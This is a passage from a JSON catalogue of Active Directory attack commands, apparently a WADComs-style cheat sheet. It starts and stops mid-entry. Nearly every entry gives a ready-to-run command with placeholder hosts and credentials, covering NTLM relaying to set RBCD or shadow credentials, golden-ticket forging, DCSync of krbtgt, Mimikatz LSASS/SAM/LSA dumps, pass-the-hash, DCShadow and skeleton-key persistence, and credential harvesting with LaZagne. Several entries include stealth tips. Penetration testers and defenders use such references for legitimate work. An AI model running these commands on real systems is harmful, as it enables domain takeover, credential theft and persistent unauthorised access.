and read data as the relayed user. This is useful when you want hands-on access to the target's filesystem instead of blind command execution, and pairs with a coercion primitive (PetitPotam, printerbug, dementor) to feed authentications into the relay.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tLocal interactive port: 11000","mitre":[],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-RBCD","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-NTLMRelayX-RBCD","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Relay coerced machine auth to LDAPS and configure RBCD on the victim object\n# (auto-creates a computer account to delegate from when you hold MachineAccountQuota)\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --delegate-access","description":"Impacket's ntlmrelayx.py relays coerced NTLM authentication from a victim computer to LDAPS on the Domain Controller. With --delegate-access it writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the relayed computer object, granting an attacker-controlled account Resource-Based Constrained Delegation (RBCD) over it. After the relay, getST.py can request a Service Ticket impersonating any user (including a Domain Admin) to the victim. This requires an account to delegate to (create one first with --add-computer or Impacket's addcomputer.py) and a coercion primitive such as PetitPotam or the printer bug to force the victim's machine account to authenticate. LDAPS is preferred because RBCD writes require a channel not protected by LDAP signing.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tAttacker computer account: ATTACKER$","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-ShadowCredentials","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-NTLMRelayX-ShadowCredentials","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Persistence","Credential Access","Execution"],"nativeCategory":["Persistence","Credential Access","Exploitation"],"command":"# Add a Key Credential to the target account via relayed write access\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --shadow-credentials --shadow-target 'DC01$'","description":"Impacket's ntlmrelayx.py relays authentication to LDAP/LDAPS and, with --shadow-credentials, performs a Shadow Credentials attack by writing a new Key Credential into the target's msDS-KeyCredentialLink attribute. This adds an attacker-controlled certificate/key pair to the account, allowing later PKINIT authentication to obtain a TGT (and the account's NT hash via UnPAC-the-hash) without changing its password. --shadow-target selects which principal to backdoor; the relayed identity must have write access (GenericWrite/GenericAll) to that object. The attack requires the domain to support Key Trust (a KDC with PKINIT, i.e. an AD CS PKI or Server 2016+). ntlmrelayx saves the generated certificate so you can authenticate with it afterwards using gettgtpkinit.py or PKINITtools.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tShadow target account: DC01$","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"added":true},{"id":"wadcoms:Impacket-owneredit","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-owneredit","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Persistence"],"nativeCategory":["PrivEsc","Exploitation","Persistence"],"command":"# Set john as the owner of the victim object\nowneredit.py -action 'write' -new-owner 'john' -target 'victim' -dc-ip 10.10.10.1 'test.local/john:password123'","description":"Impacket's owneredit.py reads or changes the owner set in an object's security descriptor over LDAP. Because the owner has implicit WriteDacl, `-action write -new-owner` lets you seize ownership of a target you hold WriteOwner over, then combine it with dacledit.py to grant yourself full control. Use `-action read` first to record the original owner for cleanup. Together owneredit + dacledit reproduce the WriteOwner-to-takeover chain on Linux.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew owner: john\n\n\tTarget object: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:Impacket-RaiseChild","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-RaiseChild","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# Escalate from child-domain admin to forest root via ExtraSid golden ticket\nraiseChild.py test.local/john:password123","description":"Impacket raiseChild.py automates child-domain-to-forest-root privilege escalation by abusing the intra-forest trust. Given Domain Admin credentials in a child domain it DCSyncs the child krbtgt, forges a golden ticket with an Enterprise Admins ExtraSid from the forest root, and uses it to compromise the parent, optionally executing a command on the root DC. Requires child-domain administrative credentials.\n\nCommand Reference:\n\n\tChild domain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/domain-trusts/child-parent","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection"],"added":true},{"id":"wadcoms:Impacket-TicketConverter","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-TicketConverter","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Defense Evasion"],"nativeCategory":["Collection","Defense Evasion"],"command":"# kirbi -> ccache (for Impacket)\nticketConverter.py ticket.kirbi out.ccache\n\n# ccache -> kirbi (for Rubeus/Mimikatz)\nticketConverter.py out.ccache ticket.kirbi","description":"Impacket ticketConverter.py converts between the .kirbi format (used by Mimikatz and Rubeus) and the .ccache format (used by Impacket and MIT Kerberos), in either direction, based on the input file extension. This bridges Windows and Linux tooling: dump a TGT with Rubeus, convert it, and reuse it from an Impacket workflow (or vice versa). It performs no network activity.\n\nCommand Reference:\n\n\tInput ticket: ticket.kirbi\n\n\tOutput ticket: out.ccache","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Impacket-Ticketer-AES","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-Ticketer-AES","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Persistence","Execution"],"nativeCategory":["Persistence","Exploitation"],"command":"# Forge an AES golden ticket -> administrator.ccache\nticketer.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92 -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local administrator\n\n# Use it\nexport KRB5CCNAME=administrator.ccache","description":"Impacket ticketer.py forges golden (or silver) tickets offline; supplying -aesKey signs the ticket with the krbtgt AES256 key instead of the RC4/NT hash, producing an AES-encrypted TGT that blends in with modern Kerberos traffic. The resulting .ccache can be exported to KRB5CCNAME and used by any Impacket tool for pass-the-ticket. Requires the krbtgt AES key and the domain SID.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tDomain: test.local\n\n\tTarget user: administrator","mitre":["T1558.001"],"requires":["AES_Key"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"added":true},{"id":"wadcoms:John-keepass2john","toolId":"wadcoms:John","toolName":"John","name":"John-keepass2john","source":"DAEMON","platform":["Linux"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# extract the master-key hash from the .kdbx\nkeepass2john Database.kdbx > hashes.txt\n\n# crack the master password\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt","description":"KeePass databases (.kdbx) looted from a share or a compromised host are frequent sources of privileged credentials. John the Ripper's keepass2john helper converts the database master-key parameters into a crackable hash, which john then attacks with a wordlist. It handles both password-only and keyfile-protected databases (pass the keyfile with -k). Fully offline; a recovered master password opens every secret in the vault.\n\nCommand Reference:\n\n\tKeePass DB: Database.kdbx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1555.005"],"requires":["No_Creds"],"references":["https://github.com/openwall/john","https://hashcat.net/wiki/doku.php?id=example_hashes","https://attack.mitre.org/techniques/T1555/005/"],"added":true},{"id":"wadcoms:John-pfx2john","toolId":"wadcoms:John","toolName":"John","name":"John-pfx2john","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# extract the crackable hash from the .pfx\npfx2john cert.pfx > hashes.txt\n\n# crack the passphrase (john auto-detects the pfx format)\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt","description":"A password-protected PKCS#12 certificate store (.pfx / .p12) recovered during collection can be opened offline. John the Ripper's pfx2john helper extracts the encryption parameters into a crackable hash, which john then brute-forces against a wordlist. Recovering the passphrase unlocks the private key and certificate, which can be used for PKINIT/Schannel authentication (e.g. via certipy or Rubeus). Runs entirely offline with no target interaction.\n\nCommand Reference:\n\n\tPFX File: cert.pfx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1110.002"],"requires":["No_Creds"],"services":["ADCS"],"references":["https://github.com/openwall/john","https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate","https://attack.mitre.org/techniques/T1110/002/"],"added":true},{"id":"wadcoms:JuicyPotatoNG-SeImpersonate","toolId":"wadcoms:JuicyPotatoNG","toolName":"JuicyPotatoNG","name":"JuicyPotatoNG-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# -t * tries both token-creation APIs, -l sets the local COM server port\nJuicyPotatoNG.exe -t * -p \"C:\\Windows\\System32\\cmd.exe\" -a \"/c whoami\" -l 9999","description":"JuicyPotatoNG revives the JuicyPotato DCOM abuse against modern Windows by using a specific CLSID and a local COM server on a non-default port to coerce a SYSTEM authentication, then impersonates the token. The -t flag selects the token API: 't' uses CreateProcessWithTokenW (needs SeImpersonatePrivilege), 'u' uses CreateProcessAsUserW (needs SeAssignPrimaryTokenPrivilege), and '*' tries both. It works on Windows 10 / Server 2019 and later where classic JuicyPotato was blocked. Requires SeImpersonate or SeAssignPrimaryToken on the service account.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tCOM listen port: 9999","mitre":[],"requires":["Shell"],"services":["DCOM"],"references":["https://github.com/antonioCoco/JuicyPotatoNG","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato"],"added":true},{"id":"wadcoms:Krbrelayx-Unconstrained-TGT","toolId":"wadcoms:Krbrelayx","toolName":"Krbrelayx","name":"Krbrelayx-Unconstrained-TGT","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Privilege Escalation","Execution"],"nativeCategory":["Credential Access","PrivEsc","Exploitation"],"command":"# Export mode: capture forwarded TGTs using the unconstrained account's key\npython3 krbrelayx.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92\n# Then coerce dc.test.local to authenticate (PetitPotam/printerbug) to drop a TGT ccache","description":"krbrelayx.py by dirkjanm abuses Kerberos unconstrained delegation. When you control an account or computer configured with unconstrained delegation, any principal that authenticates to it via Kerberos forwards a usable TGT inside the ticket. Running krbrelayx.py with the account's key (AES key or NT hash) and no relay target puts it in export mode: it starts an SMB/HTTP listener, decrypts incoming Kerberos service tickets, and writes the embedded TGTs to ccache files on disk. Coercing a Domain Controller (via PetitPotam or the printer bug) to authenticate yields the DC's TGT, which can then be used with secretsdump.py for a full DCSync. This is the Kerberos analogue to NTLM relaying and bypasses SMB signing.\n\nCommand Reference:\n\n\tDelegation account AES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain Controller IP: 10.10.10.1\n\n\tOutput ccache: out.ccache","mitre":[],"requires":["AES_Key"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/krbrelayx","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained"],"added":true},{"id":"wadcoms:LaZagne-All","toolId":"wadcoms:LaZagne","toolName":"LaZagne","name":"LaZagne-All","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"laZagne.exe all","description":"LaZagne is an open-source credential harvester that walks dozens of local software modules - browsers, mail clients, Wi-Fi, LSA secrets, credential vaults, chats, databases, and more - and recovers stored passwords in one pass. The 'all' argument runs every module; results can be written to file with -oN (json), -oA (all formats), or -oJ. Some modules (LSA secrets, Wi-Fi) need administrator rights while browser and app creds are readable in the user's own context, making it a fast triage tool after initial access.\n\nCommand Reference:\n\n\tTarget host: local (current user context)","mitre":["T1555"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/AlessandroZ/LaZagne","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/"],"added":true},{"id":"wadcoms:ldapdomaindump-Enum","toolId":"wadcoms:ldapdomaindump","toolName":"ldapdomaindump","name":"ldapdomaindump-Enum","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Dump all domain objects (users, groups, computers, policy, trusts) to HTML/JSON/greppable files\nldapdomaindump -u 'test.local\\john' -p password123 -o output_dir ldap://10.10.10.1","description":"ldapdomaindump (dirkjanm) authenticates to a Domain Controller over LDAP/LDAPS with any valid domain account and dumps the whole directory - users, groups, computers, domain policy, and trusts - into ready-to-read HTML tables plus machine-parsable JSON and greppable text. It is a fast first-pass inventory when you land your first set of credentials and want an offline overview of the domain before running heavier tooling. Output lands in the directory given with -o (default: current dir).\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/dirkjanm/ldapdomaindump","https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:ldapnomnom-UserEnum","toolId":"wadcoms:ldapnomnom","toolName":"ldapnomnom","name":"ldapnomnom-UserEnum","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Anonymous, lockout-free username validation via cLDAP LDAP Ping; DCs auto-discovered from DNS\nldapnomnom --input usernames.txt --output output.txt --dnsdomain test.local","description":"ldapnomnom (lkarlslund) anonymously bruteforces valid Active Directory usernames at very high speed by abusing cLDAP LDAP Ping (Netlogon) requests against Domain Controllers. Because a valid name produces a different response than an invalid one, existence can be confirmed without authenticating - so there are no failed logons and no account lockouts, making it far quieter than Kerberos pre-auth enumeration. Feed it a wordlist with --input and it writes the valid names to --output; --dnsdomain lets it auto-discover DCs via DNS. Ideal for pre-credential recon.\n\nCommand Reference:\n\n\tNo_Creds\n\tUsername wordlist: usernames.txt\n\tOutput file: output.txt\n\tDomain: test.local","mitre":["T1087.002"],"requires":["No_Creds"],"services":["LDAP","Kerberos"],"references":["https://github.com/lkarlslund/ldapnomnom","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:ldeep-Enum-All","toolId":"wadcoms:ldeep","toolName":"ldeep","name":"ldeep-Enum-All","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Collect everything into files prefixed 'output' (output_users.json, output_groups.json, ...)\nldeep ldap -u john -p password123 -d test.local -s ldap://10.10.10.1 all output","description":"ldeep is an in-depth LDAP enumeration utility that ships dozens of focused subcommands (users, groups, memberships, trusts, GPOs, delegation, PSOs, and more) under its ldap mode. The all subcommand collects computers, domain_policy, zones, gpo, groups, ou, users, trusts and pso in one pass and writes each to files prefixed with the base name you supply. Run it with any valid domain account when you want a complete, structured snapshot of the directory to grep offline. Individual subcommands (e.g. ldeep ldap ... trusts) can be run afterward for targeted queries.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/franc-pentest/ldeep","https://www.hackingarticles.in/active-directory-enumeration-ldeep/","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:MANSPIDER-Content-Search","toolId":"wadcoms:MANSPIDER","toolName":"MANSPIDER","name":"MANSPIDER-Content-Search","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Credential Access","Discovery"],"nativeCategory":["Collection","Credential Access","Discovery"],"command":"# Search file CONTENT for 'password' across all readable shares on a host\nmanspider 10.10.10.1 -c password -u john -p password123 -d test.local\n\n# Hunt spreadsheets/office docs mentioning credentials, content-only (no download)\nmanspider 10.10.10.1 -c passw creds -e xlsx docx csv -n -u john -p password123 -d test.local","description":"MANSPIDER (Black Lantern Security) crawls readable SMB shares across one or many hosts and greps inside the files it finds, so it catches secrets buried in documents, spreadsheets and text files rather than just interesting filenames. -c/--content takes one or more regexes matched against extracted file contents (it can parse PDF, Office and other formats), while -f/--filenames and -e/--extensions narrow the crawl by name or type. It downloads matching files to the loot directory by default; add -n/--no-download for a quieter content-only sweep. Useful for wide domain-scale secret hunting once you hold any domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/blacklanternsecurity/MANSPIDER","https://www.blacklanternsecurity.com/2020-11-04-MANSPIDER/"],"added":true},{"id":"wadcoms:Mimikatz-Crypto-ExportCerts","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-Crypto-ExportCerts","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"mimikatz.exe \"crypto::capi\" \"privilege::debug\" \"crypto::cng\" \"crypto::certificates /systemstore:LOCAL_MACHINE /store:My /export\" exit","description":"Mimikatz crypto::certificates lists and, with /export, extracts certificates and their private keys from a CryptoAPI store to .pfx/.der files, even when the private key was marked non-exportable. crypto::capi (and crypto::cng for CNG keys) patches the key-provider in memory first so the non-exportable flag is bypassed. Point /systemstore at LOCAL_MACHINE for machine certs or CURRENT_USER for user certs; exported .pfx files enable certificate-based (PKINIT) authentication as that principal.\n\nCommand Reference:\n\n\tStore: LOCAL_MACHINE\\My\n\n\tExport password: mimikatz (default for exported .pfx)","mitre":["T1552.004"],"requires":["Shell"],"services":["ADCS"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://attack.mitre.org/techniques/T1552/004/"],"added":true},{"id":"wadcoms:Mimikatz-DCShadow","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DCShadow","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Defense Evasion"],"nativeCategory":["Persistence","Defense Evasion"],"command":"# Instance 1 (SYSTEM) - stage the change\nmimikatz.exe \"!+\" \"!processtoken\" \"lsadump::dcshadow /object:john /attribute:primaryGroupID /value:512\"\n\n# Instance 2 (Domain Admin) - push the replication\nmimikatz.exe \"lsadump::dcshadow /push\" exit","description":"Mimikatz lsadump::dcshadow temporarily registers a rogue domain controller and pushes attacker-chosen attribute changes into the directory through legitimate replication (MS-DRSR), which sidesteps normal object-modification auditing. It runs as two cooperating instances: an elevated SYSTEM instance stages the change with /object, /attribute and /value, and a second instance holding Domain Admin (or the required replication rights) triggers the push with /push. Use it for stealthy persistence such as writing a primaryGroupID or SIDHistory.\n\nCommand Reference:\n\n\tTarget object: john\n\n\tAttribute: primaryGroupID = 512 (Domain Admins)","mitre":[],"requires":["Shell"],"services":["LDAP","RPC"],"references":["https://github.com/gentilkiwi/mimikatz","https://www.dcshadow.com/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcshadow"],"added":true},{"id":"wadcoms:Mimikatz-DCSync-Krbtgt","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DCSync-Krbtgt","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"mimikatz.exe \"privilege::debug\" \"lsadump::dcsync /domain:test.local /user:krbtgt\" exit","description":"Mimikatz lsadump::dcsync impersonates a domain controller and uses the MS-DRSR replication protocol (GetNCChanges) to pull the password data of a chosen account from a live DC, without ever running code on that DC or touching NTDS.dit on disk. Targeting krbtgt yields the KDC key needed to forge Golden Tickets. It requires an account with the Replicating Directory Changes / Replicating Directory Changes All rights (Domain Admins, Enterprise Admins, or a delegated principal).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tTarget user: krbtgt","mitre":["T1003.006"],"requires":["Shell"],"services":["Kerberos","LDAP"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync","https://attack.mitre.org/techniques/T1003/006/"],"added":true},{"id":"wadcoms:Mimikatz-DPAPI-Masterkey-Cred","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DPAPI-Masterkey-Cred","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"dpapi::masterkey /in:\\\"%appdata%\\Microsoft\\Protect\\S-1-5-21-1339291983-1349129144-367733775-1001\\<GUID>\\\" /sid:S-1-5-21-1339291983-1349129144-367733775-1001 /password:password123\" \"dpapi::cred /in:\\\"%appdata%\\Microsoft\\Credentials\\<GUID>\\\"\" exit","description":"Mimikatz dpapi::masterkey decrypts a user's DPAPI master key from the Protect folder using their password (and SID), and dpapi::cred then uses that cached master key to decrypt a Credential blob into its stored plaintext secret. DPAPI protects saved RDP, browser, scheduled-task, and Credential Manager secrets, so this chain recovers them offline from copied files. If you lack the user's password, dpapi::masterkey /rpc asks the domain controller to decrypt the key with the domain DPAPI backup key.\n\nCommand Reference:\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tPassword: password123","mitre":["T1555.004"],"requires":["Shell","Password"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"added":true},{"id":"wadcoms:Mimikatz-LogonPasswords","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LogonPasswords","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit","description":"Mimikatz sekurlsa::logonpasswords reads the authentication material cached in LSASS memory and reconstructs plaintext passwords, NT/LM hashes, and Kerberos keys for every interactive, service, and network logon session on the host. It requires local administrator rights and SeDebugPrivilege, which privilege::debug enables before touching LSASS. This is the classic loud credential dump; on hardened hosts (Credential Guard, PPL, or EDR hooking LSASS) it will fail or be caught, so prefer an offline minidump plus pypykatz when OPSEC matters.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tPrivilege: SeDebugPrivilege","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:Mimikatz-LsadumpSAM","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LsadumpSAM","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::sam\" exit","description":"Mimikatz lsadump::sam decrypts the local SAM database using the boot key from the SYSTEM hive and dumps the NT hashes of all local accounts, including the local Administrator. Running it live requires SYSTEM-level access, so token::elevate is used to raise from an administrative shell to SYSTEM. The recovered local hashes are ideal for local pass-the-hash and for spotting password reuse across a fleet where the same local admin hash is shared.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SAM + SYSTEM)","mitre":["T1003.002"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/002/"],"added":true},{"id":"wadcoms:Mimikatz-LsadumpSecrets","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LsadumpSecrets","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::secrets\" exit","description":"Mimikatz lsadump::secrets decrypts the LSA secrets stored under the SECURITY registry hive, exposing service account passwords, scheduled-task credentials, cached DPAPI machine keys, auto-logon passwords, and the machine account secret in cleartext. It needs SYSTEM rights, so token::elevate is chained after privilege::debug. LSA secrets frequently hand over a domain service account password that no other technique reveals.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SECURITY + SYSTEM)","mitre":["T1003.004"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/004/"],"added":true},{"id":"wadcoms:Mimikatz-PassTheHash","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-PassTheHash","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"mimikatz.exe \"privilege::debug\" \"sekurlsa::pth /user:john /domain:test.local /ntlm:2a3de7fe356ee524cc9f3d579f2e0aa7 /run:cmd.exe\" exit","description":"Mimikatz sekurlsa::pth performs pass-the-hash by starting a new process whose logon session is seeded with a supplied NT hash (or AES key), letting network authentication proceed as the target user without knowing their password. The spawned process (here cmd.exe) can then reach SMB, WMI, or WinRM as john. It requires local administrator rights on the box you run it from because it patches the new process's LSASS session; use /aes256 instead of /ntlm for an overpass-the-hash that requests Kerberos tickets.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7","mitre":["T1550.002"],"requires":["Shell","Hash"],"services":["NTLM","SMB","Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/ntlm/pass-the-hash","https://attack.mitre.org/techniques/T1550/002/"],"added":true},{"id":"wadcoms:Mimikatz-PassTheTicket","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-PassTheTicket","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"mimikatz.exe \"kerberos::ptt ticket.kirbi\" exit","description":"Mimikatz kerberos::ptt injects a Kerberos ticket (.kirbi TGT or TGS) directly into the current logon session's ticket cache, so subsequent tools authenticate with it transparently. Unlike sekurlsa::pth it does not spawn a process or need administrator rights, since it only writes to the caller's own cache. Use it to replay a harvested or forged ticket for pass-the-ticket lateral movement, then verify with klist.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":["T1550.003"],"requires":["Shell","TGT"],"services":["Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1550/003/"],"added":true},{"id":"wadcoms:Mimikatz-SkeletonKey","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-SkeletonKey","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"mimikatz.exe \"privilege::debug\" \"misc::skeleton\" exit","description":"Mimikatz misc::skeleton patches the LSASS process of a live domain controller in memory so that a master password (the hardcoded default 'mimikatz') is accepted for any domain account alongside each user's real password. It is a stealthy but volatile persistence primitive: the patch lives only in memory and is lost on DC reboot, and it downgrades some Kerberos encryption which detections watch for. It requires Domain Admin / SeDebugPrivilege on the DC and only works against DCs not running LSA as a protected process.\n\nCommand Reference:\n\n\tTarget: Domain Controller DC01 (dc.test.local)\n\n\tMaster password: mimikatz (built-in 